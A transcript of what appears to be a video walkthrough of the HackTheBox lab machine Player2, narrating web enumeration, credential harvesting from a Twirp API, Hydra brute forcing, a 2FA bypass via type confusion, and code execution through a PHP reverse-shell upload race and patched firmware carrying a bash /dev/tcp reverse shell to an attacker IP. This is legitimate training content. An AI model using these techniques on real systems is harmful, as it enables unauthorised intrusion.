What's going on YouTube? This is Ipsec. I'm doing Player2 from HackTheBox, and if you wanted a video on heap exploitation, because that's the intent and priv-esc of this box, unfortunately that's not this video. I spent a good 5 to 6 hours on that part of the video alone and just couldn't get an explanation I really liked, so I decided to cut it from the video. I do have a Wacom tablet, so I can draw on the screen. Unfortunately, I just don't know how to use it, so once I figure that out, I will probably revisit heap exploitation. The box itself is really challenging and has a handful of unintended routes that we will be exploring. My favorite one is the firmware upload piece. Actually has a race condition if you can find the upload directory, so you can just upload a web shell and get code execution without dealing with modifying the firmware. And if you don't know what I'm saying, it may make sense later on, so let's just jump into the box. As always, we're going to start off with this sudo nmap with -sc for default scripts, sv enumerate versions, oa output auth formats, put it in the nmap directory and call it player2, and then the IP address, which is 10.10.10.170. Can take some time to run, so I've already ran it. Looking at the results, we have just 2 ports open, the first one being SSH on port 22, and then we also have HTTP on port 80. The banner tells us it's an Ubuntu server, both on SSH and HTTP, and we don't really get all that much information. So I'm going to do a full port scan on this to run this in the background while I look at it. So -p- does all ports, 10.10.10.170, and we'll do OA, nmap player2 all ports, and just let that run while we go take a look at the site. So going to 10.10.10.170, we get a weird error message that said, oops, something went wrong. Please contact Mr. Reboot at player2.htb. So it looks like we got a host name right here. So I'm just going to test this out, and we'll send this over to Burp Suite, refresh the page, and I'm mainly going to add the host header or edit it. And it said player2.htb, I think. I'm just going to put this in the repeater tab, send it, and we actually get a page. So I'm going to go over into my host file and we'll add that entry. So we can do 10.10.10.170 is player2.htb. Save that. And in Firefox, we'll turn burp off so we can go look at the page easily. So player2.htb. And it looks like we get a page. So the very first thing I do is Control U to open the page source, and I just look at kind of the headers to see if I can identify if like WP dashes in it to indicate it's a WordPress page or something that indicates it's Drupal. Just want to kind of identify the service. So we do see a different domain, product.player2.htb. So I'm going to go back into my host file, and we're going to put that entry. So product.player2.htb, save that. And let's see, I'm going to search for .php, and we don't see anything. .html, don't see anything. So I want to see if I can figure out what type of server this is running on. So I'm going to try index.html, and we get a not found. I'll try index.php, and we get a page. So we know this web server now is running PHP, so let's go take some notes. So Control N to create a new node. I should have put player2, but oh well, that'll be fine. Notes, web server is running PHP on player2.htb. So could be handy. If we ever get like a file write thing, we can just try to drop a PHP web shell. Looking at this, just reading through to see if there's anything interesting. I believe this one is from the very first player machine, and it's not too much there. We have a contact form, so I always like saying whenever there's user input to do some testing. So we'll do ipsec root at please. We'll do ipsec.rocks, and please subscribe to my videos, or to my YouTube, I guess. We make sure we're on intercept mode, we can drop this request, send it, and it does a post to /mail. So I'm just going to go to the repeater tab, send the request, and we just get a JavaScript box that says, thank you for your visit. We'll get back to you as soon as we can, and it does okay. So nothing really too interesting here. I can try like just getting mail, and we can see what happens. As soon as we hit mail, it just says that and redirects us. We can see if we can navigate to like the actual script. So we can try mail.php and the same exact response happens. We can do mail.php.back and we get not found. So we know the web server is just appending .php to a bunch of things. So I guess that's kind of good to know. I'm going to run Gobuster, so we always have some type of recon running in the background, and then we'll move over to look at the product domain. So Gobuster-u, http player2.htb-w for word list, user share word list, dirbuster, and we'll do directory list 23 medium.txt. We'll do -o for out file. And I want to make a directory for Gobuster. We'll put in Gobuster / player2.htb I guess basic.out, because we're not doing anything. If I did like -x arguments for PHP, I would probably put player2.htb PHP, but I'm just looking for basic things. I don't need to put a file extension on it because when we looked at mail and mail.php, they were the same. So I'm going to ignore that to save some time. Let's do directory mode. And I think that is all we need. Great. So we got that Gobuster running in the background. And we can look at product.player2.htb. And we get a login prompt. So the very first thing I'm going to do is try login with like admin, and we get a JavaScript box that says nope and returns us. So I'm going to do some basic like SQL detection. So put a bunch of special characters in it to see if anything happens. And we could unmask this if I hit F12, click on this little arrow, go here. And where it says type equals password, just erase password. And you can see what I put. I just hand jammed a bunch of special characters. But click sign in, go over to Burp Suite. You can drop that request. Here's the login. And I'm doing this just so I can easily identify the output. I can also look at the bytes at the bottom. We can send characters one at a time, just in case we cause some weird error, but it doesn't look like anything's there. If I was actually doing this machine, I'd probably run SQL map in the background, but I don't want to run too many programs because I may slow down the machine or my VM. So I'm just going to run Gobuster here, put in dir mode -h. We'll do, what was it? Product.player2.htb -o for out file, put in Gobuster, product.player2.basic, I think, is how we did before. -w for word list, user share word list, dirbuster, directory list 23 medium. I screwed something up. -u probably. There we go. So we have a few things. Oh, what? Index. Is mail and stuff accessible here? Let's try this. Proxy, turn intercept off. So on product player2.htb, if we go to /mail, oh, it is. That's weird. So these pages return different things, but index is different. So maybe index.php on this, if it detects the host name is product, it goes one place. If it goes checks it for another, it goes somewhere else. I don't fully understand that behavior right now, but we'll just move on and see what we have. There is a src, which looks like a source directory. I'm guessing anything that returns status 200 is going to be a HTTP OK, and 301 is going to be a redirect. So we could take a look at the /source directory. Product does not have that directory. we get a forbidden. So we may want to try like source mail.php. We get not found. So in this one, we may want to do some extensions. There is a vendor and a proto directory. So we can try checking those as well. Checking vendor, we get forbidden. Proto, we get forbidden. We have /API. That one is interesting. We don't have API in the non-product version. So that's just not found. But if we added product.player2.htb, there are some things. So this is definitely interesting behavior. While these Gobusters run, we're going to start up yet another Gobuster. And this one's going to be doing virtual host. So I'm going to see if I can find a word list because I don't know exactly what one I want to use right now. But I know it's going to be under sec list, and I don't know if I have that here. So we'll do sudo apt search sec list, sudo apt install sec list, and that is weird. I wonder if I screwed up my apt repository. Let's just get sec list GitHub. Turn burp suite off. And we'll just manually install this. So cd opt git clone. And I probably could have just downloaded it and not downloaded all this revision history because it looks like it's going to be a lot bigger than I need. Let's see. Is it going to be faster if I just download the release? Issues? No. Clone. Download zip. That's what I was looking for. Because this won't contain the .git folder, I believe. So it should be, in theory, much smaller. Also, it being zipped up does help. So let's do cp, downloads, and my VM is definitely starting to slug along with these two Gobusters running. And Firefox. It's thinking about downloading. Close these two tabs to free up some memory. I think I have what I need from Gobuster. I'm going to stop these just to free up some resources on my machine. And it looks like the Git has finished, so we can just download it. And du-hs stir. I'm just looking at the file size. We'll do .git. And we can see the Git folder is pretty much probably double the size of this. So I'm not ever going to do a Git pull. I'm just going to re-download it. I'll just delete the directory. So let's go and look at find grep-i DNS. And there is a name list. Oh, subdomains. This looks like exactly what I want. The discovery DNS what thing. So let's do Gobuster-H, and we want to put it in DNS mode for DNS subdomain brute forcing. Whoa, no, we want VHOST, virtual host brute forcing. Why is my highlight not working when I click? Weird. Something's going on with my terminal. So we'll do Gobuster DNS-H to look at the options. It's probably the same exact thing. Let's see. Oh, -D is target domain. So D product dot, no, probably player2.htb and -W for word list. And since I don't know exactly what this is, I'm just gonna we'll v test, put product, and please subscribe. So now when we do test, let's see, return the same IP. Oh, I said vhost, not DNS. That's probably why the help option wasn't making too much sense to me. So vhost, and we can do, let's see, -u for URL, product.htb, and word list, we'll do test. And it looks like we'll probably be going for size. So we can do word list, and it's going to be opt, sec list, discovery, DNS, subdomains, top million, 5000.txt. We'll do Gobuster, vhost, and run this. And then I'm just going to probably grep-v on the size, or maybe I'll do a sort and look at all the unique sizes. But hopefully the domain name isn't part of that size, which it very well could be, because glancing at this, the size is definitely changing. So let's see. Yeah, the size definitely does change. So there's got to be a better way to do this. But I'm drawing a blank, so I'm just going to try doing a grep real quick against this. So do grep, and then space 8, and then any character 0 to 9, any character 0 to 9, and then an end bracket. So if we grep that for Gobuster vhost, we get that. Do a -v to exclude that size, 900. So we can say 8 to 9, 0909, and that probably will work. So all I'm doing here is grepping anything where the size is 800 to 999 and excluding those, because that's probably going to be part of this subdomain. So let this go run now that we have a way we may be able to sort through this in some type of way. And as that goes, we can take a look back at our NMAP, and we do see a third port, 8545. So I'm going to do nmap-sc sv-n to not do DNS, because I just want it to go a little bit quicker. And we'll do 10.10.10.170-p for port 8545, and see what this outputs. So nmap has started. It's undergoing service scan. I'll rename this shell to be recon. Oh, we'll just name it Gobuster. Oh, it finished. So we can do that grep again, and we don't get anything. And I just want to make sure that maybe product wasn't on this list. Sweet, my copy and paste is working. Grep product on this, it is. So what we did to exclude it probably was not a good thing. So grep product on Gobuster vhost. We'll do product.player2.htb, and right off the bat we can see where we went wrong. The vhost is putting it at the domain level, not the subdomain. So Gobuster vhost-h, and let's see, is there a way to do this? Cookies, follow redirects. Huh. I don't know if this does subdomains. So probably put in a feature request to do that. And until then, we will use wfuzz. So wfuzz -w for word list. And we'll use that same word list. I was hitting Alt period to cycle through previous commands. dash H for header. And I'm going to go over to burp suite just to make sure I get the header right. It is host. So host. And this will be fuzz. And fuzz is going to take the lines out of this. So .player2.htb. And then dash U for URL, HTTP, player2.htb. So this should be better. And it looks like it definitely is. So we can probably do dash dash HW to hide words of 14. And we'll see if we get any hits here. What? gc.mcdcs? That is a weird one. gc.mcdcs.player2.htb. Let's just put this in burp suite. So that is the error string. And it's a response code of 400, so it's not too important. But we do find product. And I am a little curious. What if we do please subscribe? Same thing. GC, oh, there's an underscore. Maybe it just doesn't like underscores. Yeah. So it doesn't like an underscore in the host header. So if we do please underscore subscribe and send it, we get a 400. So that's probably the only one in that word list that has a underscore. Okay, that makes sense. We haven't found any extra subdomains, so thankfully we can probably exclude that. And I'm going to close all these panes because we are finished with all the Gobustering we think we need. And then we see this, and it's looking like NMAP thinks 8545 is a web server, and the web server is running PHP 7.2.2.4 Ubuntu. And if we look at here, we have TWIRP invalid route is an error message it's getting. So let's go and hit this box on port 8545. And this is what we get. So TWIRP invalid route. I'm going to search on that message to see exactly what we get. And reading all of this and reading exactly what TWIRP is, there's one thing that stands out. And if we took better notes, it would really stand out. Matching Protobuf messages. And if you looked more into Protobuf, you'd see their extensions end in .proto. And going back into the Gobuster results, if we do player2 HTTP basic.out, /proto is a directory. So if we navigate to /proto, one product, we just get a forbidden. But I believe if we do TWIRP Protobuf maybe and look around, there's something that says they should end in .proto. So let's do a Gobuster for that. I guess we're not done with Gobuster. So Gobuster dash dir for directory mode -u http player2.htb slash what is it? Proto -w forward list user share Gobuster word list, and I'm just going to do directory list 1.0 because I believe this one is much smaller, and we probably want to do -x proto for the extension. N-O, we'll do Gobuster. I'm in Gobuster's directory. So we'll just do Player2 proto, Player2, we're in the proto directory, proto. Maybe in the future when I look at that file name, I'd be like, oh, that's the proto directory and we're doing the extension for proto. I don't know. I don't have a good way to do naming conventions with Gobuster logs. I just kind of wing it as I go. The other thing we want to probably look at is the API directory. So again, if we look at Gobuster, if we looked at product, there was this /API directory. So Gobuster dir product.player2.htb/API word list users share. Oh, I wonder if setlist has anything. We'll do Gobuster word list, directory list. We'll try 10. See if this goes any quicker. And see if we get anything. So right off the bat, we do have a /totp, and we should have done an out file. So we'll do this. Product API, no args. That should be fine. And I am not in Gobuster's directory. So let this go. We can take a look at /API/TOTP. So if we go here, it was product.player2.htb, and it was /API/TOTP. Take a look, and we get the error message, cannot get. So I'm going to change the request method to be a post. Since it says we can't do a GET request, can we do a post? And now we get invalid session. So we could try changing a content type to be JSON. And I'm just doing this because most APIs interact with JSON. And then we can say like session null, just to see if it changes the message. And there's nothing really there. So I'm going to highlight this. And I really should be taking more notes as I go. This will be product.player2.htb. Invalid session. Okay. Going back here to see if we have anything. Nothing really. We could go back and potentially like brute force the 8545 directory with Gobuster, but I only have so much memory allocated to this machine. I don't want to do too much. So I'm going to let these Gobusters finish and see if we have anything to go on with. So after some time, we finally got a hit on /generated.proto, and this was in the URL player2.htb/proto. So let's go copy this, go into a pane, and we can curl that, and it was generated.proto. And looking at this, it is a protobuf, I guess, structure. I'm not too familiar with protobuf. I've only really heard about it from like the Pokemon Go reversing, because I believe Pokemon Go uses protobuf to communicate to the servers. But this is using the package TWIRP, which is a Twitch TV thing. And I went back and Googled around the TWIRP documentation. If you do TWIRP, I think curl, they give you instructions on how to interact with this. So the request protobuf message, the reply, and how to interact. It looks like it's doing a request on /TWIRP, and I don't know if I need that, so let's go and edit our request. If we just go player2.htb, port 8545, I think it was. Not index.php. There we go. Let's send this over to burp suite and examine it. So turn proxy, intercept on, send it. This request we can drop, I think. Maybe we shouldn't have dropped that. Send it, go to the repeater tab. We get bad route. So I'm going to do /TWIRP, and we still get bad route and no handler for path /TWIRP. I'm just putting stuff in to see if I can guess what the directory I need is. I don't know, so I'll keep that in mind when looking through this documentation. So it's doing TWIRP example haberdasher makehat. So looking at, I don't know if they have the full Protobuf message here. So we'll kind of just guess looking at the Protobuf file, I guess. Let's see. We'll try TWIRP / the package name. So let's do git TWIRP / package name, no handler for path. Get rid of this. Still the same thing. So looking back at the documentation, the last thing, this one's capitalized, and you got /makehat. Let's see. Wonder how I did this. Maybe protobuf and JSON. I really should just add the burps CA and my Firefox usage examples. Here we go. TWIRP example haberdasher. So I'm just going to copy this. We can do it in cherry tree. Protobuf. And we probably want to go back to curl. And let's see. That's what they're doing. So they're going to TWIRP, and then TWIRP example haberdasher. Okay. And the next one is haberdasher with a capital H, and that's the service. And then they're calling, I don't know what makehat is here. Oh, RPC, makehat. So going back to our Protobuf file, we have TWIRP Player2 auth, and the service is auth, and we probably want to hit gen creds. So let's go back to burp, and I think auth.auth/gen creds. Oh, unsupported method, only post is allowed. So let's change request method to post. Unexpected content type, application x www form URL encoded. So going back here, we can see they're doing the content type application /JSON. So we can try that. So content type, I screwed that up. Failed to parse request JSON. So let's try looking back at this. We can do number 1, try this, and we get something. If we change number to 2, do we get 2 creds? No, we don't. So I don't know exactly how this number is working. I just tried it because I saw message, and it says must be greater than 0. So what if we did number is equal to 0? Same thing. How about putting this in quotes? Same thing. Number is equal to text. So this is weird. I don't really understand it, but we're getting stuff. So I'm going to copy as a curl command and paste. And it looks like we get something. I'm going to do JQ. JQ command not found, so sudo apt install JQ. Yes. And we'll try this again. The main thing I want to do is just save all the usernames and passwords. Let's see. Curl. Is there a -q? I only want curl to print the output. So Google curl do not print header. Let's see, man curl. Remove -i. Do I have a -i in here? I do. There we go. That looks better. If I pipe an echo after that command, it'll be a bit more. Maybe before the command? There we go. It's a bit more readable this way. So what we want to do is now send this to JQ. And we can do .name and .pass. Let's see. JQ. It's been a while since I used this program. Put it in quotes. That did not work. Let's try putting a plus between them. And there we go. So let's do plus. And we separate by... Ooh. This password has special characters. We'll do a space. Syntax error, Unix shell quoting. I'm going to escape these quotes. And there we go. So get rid of this echo. And let's clean this whole thing up because this command is dirty. So copy v gencreds.sh and we'll paste this and clean it up. So let's see. Post host user agent. We probably don't need that user agent. Except probably don't need this. Don't need the encoding. Let's see. Probably don't need everything up until this JSON. Content length, I bet Carl will do that for me. Data binary we probably want. And then the URL. Let's try this. So chmod plus x, gencreds. That's looking much better. So v, gencreds, capital V, go down, and then the greater than sign to indent everything. That was this sign. But we'll do for I in sec 0 100 do indent this. Done. Does this work? Okay. So now we can direct this to a file called creds. And I'm doing this because I noticed the password is different. Like it did 0xdf and it gave us 2 different passwords. 3 different passwords. So something is definitely unique there. So now that we have a file called creds, we can do sort-wc-l, we have 101 lines. If I do sort-u, wc-l, we're now at 16 lines. So there's a lot of duplicates. So let's get rid of the wc-l. And I'm going to sed s. We're going to get rid of the quotes. Temp, move temp to creds. Okay. And it looks like every user has 4 potential passwords. So we can cat creds awk print 2 sort-u wc-l, and we only get 4. So we can do passwords.text and then change the 2 to a 1 to get users.text. And cat passwords.text. There we go. So we can now try, let's try crackmap exec. So crackmap exec -u user.text-p passwords.text SSH 10 was it 170? And I guess this isn't fixed yet in the build. View GitHub crackmap exec. Hopefully when you're doing this machine the thing fix is there, but I think if we look at the commit history, update readme, one of these dev versions has some fixes. Maybe it's this pull request. So yeah, the authentication pro thing is fixed, but we just don't have this developer version. We could install it on a machine, but it's easier just to work around it. So right now, just know I can't use a word list for a username. And that was actually fixed. I only reported it. MPGN has been super helpful with crackmap exec and fixed all the issues I reported to him, like within 24 hours. So kudos to him. We can try JKR. And we're just testing if any of the creds worked. The next will be SnowScan. And these are all HackTheBox authors, or mprox then SnowScan. So mprox. And we'll see if we get any hits. Last one is SnowScan. And if that doesn't work, there was one other place we could test a login. Product.player2.htb. And notes, I generally always like saying where login forms are. So we could do like login forms and say SSH, that URL, and kind of go down the list. That way when you come across creds, you know where to try them. Nothing hit, so we can use Hydra to brute force this. So Hydra-L users.text-p passwords.text, then product.player2.htb, and the module we want to use for Hydra is http-post-form because it is a HTTP post. So test, proxy, clear the queue, sign in. So it is a post, and it's just a regular form. We need these variables, username, password, and submit. So right after that, we say where we want to submit to, and this is submitting to probably index.php since it's just slash. And then we put what we want to actually submit, and where the username is, we do a caret user caret, and the password, you guessed it, caret pass caret and end the quote. But before we do that, we actually have to say what we want. What is an invalid request? So we look at this, and an invalid request will be nope, period. So you just got to put anything that is in this response that for invalid. So running this, if we did it correctly, which looks like we did, we have two things, 0xdf and mprox. So let's try 0xdf's login. So if we copy this, go here, turn burp suite off, 0xdf, paste, go to login. Shouldn't be taking this long. Is it going through burp suite? Looks like it was. We got a nope. What? 0xdf, paste. There we go. Don't know what happened there. We have two-factor, and it's saying one-time pad. Put something in, and we get nope, and that drops us out. So let's see if two-factor is enabled for the other user, which is mprox. So copy, mprox, paste, and it is still two-factor. So let's go examine all these requests. Exactly what is happening. See if we learn anything new about the product. So 0xdf, and we will copy, paste, intercept on, sign in. I'm going to send that to repeater. Send that one to repeater. I don't know why this check portal's coming up. I thought I disabled that. So let's clean up a request and start labeling these. You'd be surprised how much more efficient you are when you start becoming organized. So this is login request. And this is TOTP page. So if we submit, let's just submit one. Intercept was off. I'm just going to do HTTP history, send this to repeater, and submit. The OTP code I put was 1. And we just get 302 found. So if we follow that redirection to slash, it just goes here, which is weird because we got nope, but we just had a different behavior. Because in this burp window, I didn't see nope at all. So send this login request, and then we'll submit this again, and we get nope. But if we send it again, we get nothing. So there's something going on the second send right now, we can see. And the issue is probably after we get that nope, it's deleting the session. And this PHP session ID, when we do this login request, now we have an active session on the box. Session has now been destroyed because we did a login failure. And without the session, it redirects us. So with that knowledge, we can try to guess exactly what this TOTP thing is doing. And if you remember from earlier, there was a /API/TOTP. And let's undo that edit real quick. That was just at TOTP. We'll do TOTP request. And this will be API. API/TOTP, I think it was. Where it says invalid action. So we had changed the content type to be JSON, and then we were playing with action. Forget the exact error message we had got before. but if we do test, we get missing parameters. We submit this. Ooh, we don't want API. We just want TOTP. That's dead. And now we get invalid session. So when we have an active session and hit this API, we get a different thing. And it's missing parameters. So you can fuzz this. And if you did just a 1, missing parameters, if we do 0, we get a backup code. And this is actually unintended. This is a type confusion vulnerability. I think 0 means, what is 0 in PHP? PHP-I, wait, PHP, what's interactive mode? -A, there we go. If 0, echo success. If 1, so 1 is going to be true, 0 is not. So that's where the behavior is kind of coming from. So it's probably doing a kind of like a SQL injection thing here that says if the parameter is false, then display the backup codes. The intended route on this piece was to guess the action is backup codes. So both those do work. Type confusion is a pretty cool way to do this piece. But this was the intended route, and if you had looked at the TOTP request, let's log in again real quick. Let me grab the password. So copy 0xdf, paste, disable, burp, sign in. What? 0xdf. Let's see. Oh, and to go on that, if you did it as a string, it'll probably always, oh no, I'm not sure. Just know that's type confusion. If you want more, go to 0xdf's blog. If you just do 0xdf GitHub, and in case I forget at the end of the video to go over the type confusion, I'm sure he's going to have a really good blog post on this machine. So check that out if you want more of the type confusion. It's kind of hard to show it when I don't have the source in front of me right now. So we'd have to get root on the machine, and then for me to remember to go back and grab that. So let's see, we're going to do the password, and this is actually URL encoded. So I did Control-Shift-U to un-URL encode it. Go back a few times, and that's why the copy and paste didn't work. And it says you can either use the one-time pad that we sent to your mobile device or the backup codes you have with you. So that's where the backup code thing came from. So going back to burp, we got a backup code here. Send it, and we get into a new page. It's taking a little while to load, but you can see the Pro tabs player's choice. So let's look at this page. The learn more just goes down to what the next piece is. So this looks like a one-page design. So just scrolling, we can look at things. And if we want to get early access, man, that animation's annoying. It gives you a PDF here, and then we get a contact us message. I was seeing if I could hide that animation, but it doesn't look like it. So we'll do ipsec and root at ipsec.rocks, and we'll say, please like this video for the YouTube algorithm. So if we turn Burp Suite on, send the message, thank you for the visit. We'll get back to you as soon as we can. And it just goes to /mail. So it looks like that /mail is just a unprotected endpoint, and that's why we could hit it. There's mail.php both in product and not product. So now everything's starting to make a little more sense from earlier. So looking at the PDF, goes a lot about digital signatures and gives us a URL. We recommend the dev team to do a sanity check at this URL before provisioning. So if we select a file, we can try uploading a PHP web shell. So let's do vtest.php, and I'll just do php echo please subscribe. We won't do a web shell yet. We'll just do that. If we PHP to test this, it does work. So let's upload, what is it? HTTP, Player2, test.php. Open. Make sure Burp Suite is intercepting. Upload. Send. Internal server error. So it definitely did not like that. Let's see. We'll call this PHP upload. And going back to this, they give us a firmware download. So let's just download this. wget. And I'm going to upload this back to the server, and we'll see what differs between these two requests. So we can go back, drop, back, there we go. So we want to do this firmware, Burp Suite, upload. And this doesn't. So looking at this request, let's see. Where is the MIME type for this? It's doing application xtar. So if we change this to send, we still get a server error. So what I'm going to do, this will be legit upload. Let's change this to be a tar archive because it's expecting an archive. Maybe it's trying to unarchive it and then failing. So let's do, what is it? tar-cvf, please sub.tar, and test.php. So we put that file in. So we can go back here, and we're going to go through this, upload the next one. So this will be please subscribe.tar, intercept is on, upload, and it couldn't verify the signature. So at least we got a little bit further. So we know there is some type of signing on this. And if we really wanted to, we could maybe look for an uploads directory. So maybe there's a protobs/uploads. Whoops, that did not copy. So if we curl product.player2.htb/protobs uploads gives a 301. So we know that directory exists. We can try test.php, not found. So I'm going to do for I in sec 0 to 100 to devnull. So we hide error messages. And we forgot to put do. Did not work as I expected. See, I wonder if I do... We'll just go like this. Okay. Send. Looks like we were actually getting something. So right here, we do get something. So we now have a way to potentially execute code. Because, yeah, if I put an echo statement here and like do line breaks between the request, it may be more apparent. So let's try something. So let's go back to test.php and let's do a reverse shell. So locate php-reverse. Sweet, I have one here. So we can copy this to test.php, v test.php, and we have to edit the IP in this script. Oh, sweet. They've changed the script to actually allow you to set IP via an argument. That's cool, but not going to use it. We'll just hardcode it. 10.10.14.2 is my IP, I believe. Yep. And then the port we're going to use is 9001. Okay. So nc lvnp. Oh, before we do that, we'll probably have to tar this back up. And then we can do nc lvnp 9001. And let's go and redo this. Yeah. Intercept on, select file, please sub.tar. Upload. And the main reason I went first to like hunting for upload directories, if it's checking signatures, it probably has to extract something out of the tar archive to check the signature. So that's kind of why I made that one jump. Let's do shell and see if this works. We need to start that loop with a curl command. So for I in, was it up here? Yeah. So down here, we'll just do nc lvnp 9001. Hit enter. Go back here, send this, and we get a shell as www data. And this was actually unintended. We'll do the intended way real quick. Before I do that, I just want to see if my actual like request had hung. Yeah, it's funny. What? Send this a few times. Did I just hang the web server doing it this way? Hold on. That's funny. No, I did not hang the web server. Okay. I may have hung this upload process though. Let's try uploading the firmware again. Nope. I'm actually not sure. Oh, I guess the curl command doesn't complete. So since the curl command's not completing, it's not going past it. But that is the way I did to get a shell. We'll go and do the intended route now. So the intended route is looking at this firmware. So let's make the firmware, move the thing into the firmware directory, and then tar xvf the firmware. and we get 3 files. So cat info.txt. This is just, I guess, a disclaimer. Cat version. This is firmware version. And then you got the tar archive. So I'm going to remove the tar. So we're left with the firmware we haven't looked at, which is protobs.bin. If we do a file against it, it just says data. If we do strings against it, it definitely looks like an elf. Like, there's a lot of interesting things here that just scream it's an elf with glibc and things like that. We can binwalk it to see exactly what this is. And we see at hex 40 or decimal 64 into this, it finds an elf. And you can do the cheat way and just do like -me to extract it. What? -e to extract? I don't know why it's actually not extracting. Weird. Binwalk can extract. Of course, the demo gods are just me not using it that often in this fashion. It's not extracting. Generally, how I like curving things out of this, because when you do a lot of firmware stuff, you'll notice that binwalk just flags on a lot of things. I like just using dd to manually curve stuff out. Maybe if I do sudo? No. This is actually bothering me now. Let's try man binwalk and search for extract. So extract known file types, -d for type. So let's try binwalk -d elf. Do a ls, and there we go. It finally extracted it. For some reason, maybe it's not set to auto extract elves. But that's how you can do it with binwalk. Like I said before, I really like doing it manually in binwalk because if you auto extract things, it can quickly fill up your disk without you realizing it. And for some reason, that always happens to me. So let's just go back to the binwalk command. And we see it starts at 64 bytes into the file. So I'm just going to do ddif, and then we can do equals protobin, protabs.bin or protobs.bin. I don't know how to pronounce this thing. OF is equal to protobs.elf. And then we're going to do skip equals 64. And we can set the block size to whatever we want. I'm just going to set it to 1. And what this did was dd input file, take this, output file, send it here, skip the first 64 of 1. So we just skipped the very first block, or the first 64 bytes. And if we wanted to grab the first 64, we can do .head count is equal to 1 and block size is equal to 64. So the block size is how much it's going to grab before it writes, essentially. So setting the block size to 64 and saying the count is 1 means we're only going to do 1 block. So if we do enter now, we can see 64 bytes have been copied. If we do 2, you can see 128. So that's how that piece works. So now we have split the blob of data into 2 things. We have the header, which is going to be random text. This is probably the signature. And then we have the elf, which is a Linux binary. So I'm going to open up in Ghidra, and I'm going to see exactly what this is. Close, new project, Player2 firmware. The project name will be, what is this? Firmware. I'm going to make the directory Ghidra. So make dir, I'll call it reverse. I'm just doing that because Ghidra puts a bunch of files. So if I did ls in reverse, we can see all the files there. If I didn't put in a directory, it would just pollute my directory. I'm going to look at this elf. Analyze it, we'll select all and see exactly what this is. If I go over to the functions, we can see it's not stripped, so I have all the symbols and names. And it looks like I didn't set the size of this pane. I wonder if I can do properties, display. Is there a text size? Font. 16? Apply? Sweet. There we go. So looking at main, setting a bunch of buffers, put, sleep, print ASCII art. It doesn't really do all that much. So we can look at what this wait for F key is. And looking in this, it does two system commands. So system stty_raw minus echo min 0 time 10 and system stty sane. So let's take a look if we can modify this to begin with. So what I'm going to do is we'll open protobs.bin in a hex editor. And I'm going to change 1 byte. We're going to go somewhere in here. Change that. We'll put FF. So exit and save. Oh man, the theme does not like this. Protobs.bin. Let's go here. cp protobs.bin to bin.back. I just want to save that. Save. md5sum stir.bi. So I did make a modification to this. So let's package it back up. So tar-cvf, we'll do info. Oh, we have to name it. So we'll call this protobs.tar, info.text, protobs.bin, and version. So this is how it was packaged up. So we just repackaged it and we can go and upload it. So where is this? Probably in the firmware directory. Upload, verifying signature, signature failed. So did not work there. Let's try modifying something near the end of the file. So sometimes when you do like signature checks, you only check a portion of the file, because if you did a checksum on like a 10 gigabyte file, it could take a while. So sometimes people will just say, okay, let's just do the first 4096 bytes of the file or something stupid like that. So that's what we're going to check for now. So let's copy protobs.bin.back over top of .bin. And I'm going to do the tar command yet again, because I want to make sure I'm working with something that's good. So this should validate, because we should just have the stock signature. And it says it looks like legit. And then the provisioning test is just it running. So let's go back into the hex editor. Go way down the file. And we'll change this byte. So exit and save. Tar it back up. Select file. And upload. And we see it passed all the checks. So let's go back and copy that over. And we want to try editing a piece of the file that will give us code execution. So if you remember in the Ghidra, there is this system command. So I'm going to search for stty. So I'm going to do Control W to search. And can't see, I think if I hit enter, it's going to say search for string. Man, that is, I got to fix that. I'm going to search for stty. And we see this command. So I'm going to hit tab to switch over to edit the actual ASCII. I'm going to do ping. I'm going to test on my local machine. Ping-c1 localhost. Okay. I always get the option -c and -n mixed up between Linux and Windows. So that's why I wanted to test it before I did this. So -c1, 10, 10, 14, 2. And let's fill up the rest of this with junk. Sweet. Okay, let's Control X to exit and save. Tar this back up. Sudo tcp dump -i for interface ton0 icmp. And we can upload. Upload it. And we get a ping. Several times. Oh God. Am I pinging? I don't know what I did, but oh, I bet it's this. I have a script running to update this title bar to give me the latency, and it's not working right there. But that's what this noise is. We can see player2.htb is pinging me right here. So, unintended side effect of that bar. Maybe I'll remove that. So, now we know we have the ping. Now, the dangerous thing with this, let's just, whoops. Let's just exit and not save. C, Control W, enter to search for string, ping. So if we want to get a reverse shell, we shouldn't really, in most cases, go beyond the amount of space that is allocated for us. Because you could screw up the binary, like, significantly. But we're going to try not doing that. Try going beyond it. If you want to do it, you could probably echo test to like var www html t.php and then nothing, and we could try that. This may be a more OPSEC safe way to do this. So what did I call it? T.php. Okay. So upload this. And then if we went to like 10.10.10.170/t.php, do you exist? Oh, 170. It does. So you could like echo a few characters at a time into this file and build a web shell, but it'll take a while. You could script it, but this video is going to be long anyways. So let's go and see what happens if we overflow this one parameter, if it even matters. So we'll do bash -c bash-i dev tcp 10.10.14.2 9001 0 at like that, I think. And we'll see what happens. no promises. So let's exit and save. And we should start up a web shell. Let's see what happens. We got one. So that worked. Out of curiosity, I do want to look at this in Ghidra to see if Ghidra freaks out about what we did. So we can not save this. Go back. We probably need to extract it again. So we'll do dd. We'll do elf2, count 64, block size 1. No, skip. There we go. So now we can open Ghidra back up. Ghidra, run. There we go. Close. Open U. And I'm really curious what this is going to do. elf2. Analyze it now, select all, sure. The function we want is main. Then we can go to wait for F key. And it looks like it's just taking another piece of the next string. Because before, this wasn't there. So wherever this string was used, oh, you can see the next system call is a bit weird. So let's see, is it shift print screen? Select the area to grab. We can grab this. Copy it to clipboard. Go to cherry tree. Scratchpad. Paste. And then we can open the other one. Don't save. Probably could have double clicked that. But you can see, since we overflowed that one string, the program's doing really weird things. So, come on, load. Maybe we close it again. PSEF grep GHI. Oh, it loaded. And then it closed. Great. Sometimes it does not pay off to be impatient. So load, close the tip. This is going definitely slow. Goes a few tabs. Has not been happy since I created that second project. I wonder if it didn't like me closing that tip of the day so quickly. Sudo pkill Ghidra. Yet again. I'm just going to let it do its thing and load. I wonder if it's because it's trying to open that bad project. Yeah, I don't know. I guess we can just move on. This is behaving annoyingly weird. Try one last thing. -rf fw cd fw -rf reverse. So we'll delete the actual project. Ghidra run. So it doesn't have a project directory anymore. Is it going to be going faster? There it is. So didn't like something we did there. New project, shared. Oh, not shared, non-shared. Make dir reverse. Just call it that. So I don't know why it started taking so long. That was a weird bug. Or maybe I'm just really impatient. Come on, open up. So while that opens, I guess we can start getting a real shell. So Python, let's do which Python. We have Python, so python-c, import pty dot spawn, bin bash, control Z, stty raw minus echo, hit FG enter twice, and now we have a good shell here. Export term is equal to xterm, so now I can clear the screen, and let's see. Drops us here. We can look at the verify signature script, and if you guess this file name, you could have probably signed your own blob and sent anything you want up to it. I think 